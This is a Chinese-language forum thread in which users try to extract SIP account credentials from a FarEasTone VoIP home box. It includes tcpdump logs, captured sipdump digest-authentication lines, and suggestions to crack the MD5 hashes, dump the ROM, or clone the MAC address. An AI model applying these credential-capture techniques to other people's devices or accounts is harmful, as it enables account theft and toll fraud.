之前記得有看到一篇破解wt2 ssh連線帳號密碼的文章..
好像是當機器連線時候....
利用Server端遷入進行韌體確認或升級的時候...抓取連線封包來分析
分析裡面的連線帳號和密碼..
這樣很快就可以破解了 ^^"~!!
提供給對封包抓取和分析比較熟稔的大大
希望這個線索和方式可以很快對進入虎穴有快速的進展..^^"~!!
加油了~!!
此文章於 2010-04-16 08:36 AM 被 ycfu 編輯。 原因: SSH已連上
企業級遠傳070用戶 , 若自備機器者, 是直接取得SIP上線的 帳號密碼。(但是有 500 元的月租費,但是可以扣抵通話費)
樓上網兄 記得還要 偵測 registra server , proxy server
可是我根本沒這麼大的用量啊,一個月500元耶,這感覺負擔很大!
我這邊Sniffer的擷取方式,首先把WT5的IP設成DHCP,接著用tcpdump和SIPcrack(裡面的sipdump)在NAT(FreeBSD)上擷取的。
取出的資訊類似下面這些:
tcpdump
===================================
23:06:38.651080 IP freebsd.home.bootps > 192.168.1.16.bootpc: BOOTP/DHCP, Reply, length 300
23:06:38.652539 IP freebsd.home.bootps > 192.168.1.16.bootpc: BOOTP/DHCP, Reply, length 300
23:06:42.732331 ARP, Request who-has freebsd.home tell 192.168.1.16, length 46
23:06:42.732381 ARP, Reply freebsd.home is-at 00:50:8b:b2:79:45 (oui Unknown), length 28
23:06:42.733503 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 483
23:06:42.749865 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.751146 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 626
23:06:42.754150 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 782
23:06:42.771861 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.792883 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 489
23:06:42.810429 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 483
23:06:42.826614 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.828170 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 626
23:06:42.830880 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 782
23:06:42.850367 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 363
23:06:42.869426 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 553
23:06:47.608573 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 2+ A? wtntp.seed.net.tw. (35)
23:06:47.622352 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 2* 1/0/0 A 139.175.252.22 (51)
23:06:47.623166 IP 192.168.1.16.1025 > nsm6.seed.net.tw.ntp: NTPv3, Client, length 48
23:06:47.636572 IP nsm6.seed.net.tw.ntp > 192.168.1.16.1025: NTPv3, Server, length 48
23:06:50.985904 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 2+ A? (none). (24)
23:06:50.999884 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 2 NXDomain* 0/1/0 (99)
23:06:51.000711 ARP, Request who-has file.home tell 192.168.1.16, length 46
23:06:51.016761 IP 192.168.1.16.1026 > hntp1.hinet.net.domain: 4+ A? (none). (24)
23:06:51.030366 IP hntp1.hinet.net.domain > 192.168.1.16.1026: 4 NXDomain 0/1/0 (99)
23:06:51.031076 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 5+ A? (none). (24)
23:06:51.044611 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 5 NXDomain* 0/1/0 (99)
23:06:51.061649 IP 192.168.1.16.1026 > hntp1.hinet.net.domain: 7+ A? (none). (24)
23:06:51.075114 IP hntp1.hinet.net.domain > 192.168.1.16.1026: 7 NXDomain 0/1/0 (99)
23:06:51.075804 IP 192.168.1.16.1026 > dns.seed.net.tw.domain: 8+ A? (none). (24)
23:06:51.089347 IP dns.seed.net.tw.domain > 192.168.1.16.1026: 8 NXDomain* 0/1/0 (99)
23:06:51.104721 IP 192.168.1.16.1026 > hntp1.hinet.net.domain: 10+ A? (none). (24)
23:06:51.118127 IP hntp1.hinet.net.domain > 192.168.1.16.1026: 10 NXDomain 0/1/0 (99)
23:06:51.145541 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 479
23:06:51.161954 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 362
23:06:51.163486 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 626
23:06:51.169747 IP 192.168.1.16.sip > sj232-125.dialup.seed.net.tw.sip: SIP, length: 778
23:06:51.187476 IP sj232-125.dialup.seed.net.tw.sip > 192.168.1.16.sip: SIP, length: 362
.....
===================================
後面就不列了~大致是try 1024~1026 這些port吧!
sipdump
===================================
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0MzkzNzY2OWE4NjAzYThkNDk0MDlmNWJiMjI3Yjg2Y2UxMjMxYzJj"yRs8YG.gD1NmuvvUSyMuVlN69Ud6xgXh"00000001"auth"MD5"89ccb792f55d79036939a3fe80bba00d
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0MzkzNzY2OWE4NjAzYThkNDk0MDlmNWJiMjI3Yjg2Y2UxMjMxYzJj"CSM9JhWyj39wHzJ3X-J1sSac-V-Cw.ZS"00000001"auth"MD5"c201cdd03ef119e7ac4028bbd78260ea
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"VFX5zYD4ueLaRxRubd3cOu.0gHS3aruk"00000001"auth"MD5"41cb8b146a57692ad9dc41f0265cdc43
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"vQQxxzf5ofyhCfXM5ZW5OEiz3RrpvC5e"00000001"auth"MD5"eb561d1b1c394f627dacb22b5c4c96e9
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"qpf4NlRxlL2DH3RkKFyNpQoQnJkRdYnh"00000001"auth"MD5"d2680256cb6268eec6c8388aff39ee47
192.168.1.16"139.175.232.125"18777070100xxxxx"Realm"REGISTER"sip5.wt.voip11.net.tw"MTI3MTM0NDAwNzY0NjYzMTZlNzc1OTdkYjAzMzNmNjI4ZTEyYzA0NmQ1NDFm"K.D4oFyF32M01jrjxMnGowv8Bt6gYdQJ"00000001"auth"MD5"834d2d1c195f268038a9e604f8cf54ed
===================================
我看起來,認為register server應該是139.175.232.125。
目前SIP username看得到,SIP password用MD5加密過了,要嘛破解它,用嘛SSH登入後應該就能看到明碼密碼。
我自己另外有SIP BOX(白牌ATA-171M),這台好像可以改MAC Address,我是認為把MAC改成跟WT5一樣,帳號密碼設一設應該就能替換上去。
遠傳網路電話的帳號 就是你的 070 號碼, 密碼就是8位xx
功能強大與穩定的SIP gateway 應該可以上線。只要將伺服器設定正確。與mac 無關
我的上線伺服器是 218開頭的。
139開頭的是屬於seednet 申請的IP, 可能是舊seednet客戶使用
曾聽聞某位先進把是方的機器直接dump rom,取得帳號密碼。遠傳家用節費盒應該也是可這樣做,只是小弟不會啦,
期待哪位先進可以破解,這樣可以增加很多應用,用在手機上更是來去自如。
有個方法版大可以試試,
遠傳有一個選號的功能,能免費換號一次,
雖然沒有什麼號碼可以選,應該不到10個,
但是,換完以後,它會寫入小白裏,
也就是說,一定有登入及寫rom的動作,
你如果要分析封包,分析這些訊息,
應該比較容易有結果。
我也希望它能在nat下運作,這樣出國時在飯店也能用,
打台灣,統統算市話,
打台灣手機,統統3.3元/分,
台灣打070,也只要每分鐘2元(以秒計費),
和人在台灣,跟本沒分別。
書籤